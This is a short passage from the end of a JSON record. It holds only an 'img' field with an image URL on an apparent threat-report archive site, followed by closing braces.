		"img": "https://archive.orkl.eu/af7d428f50137b7a36a4975678dfe98bc20a9bfd.jpg"
	}
}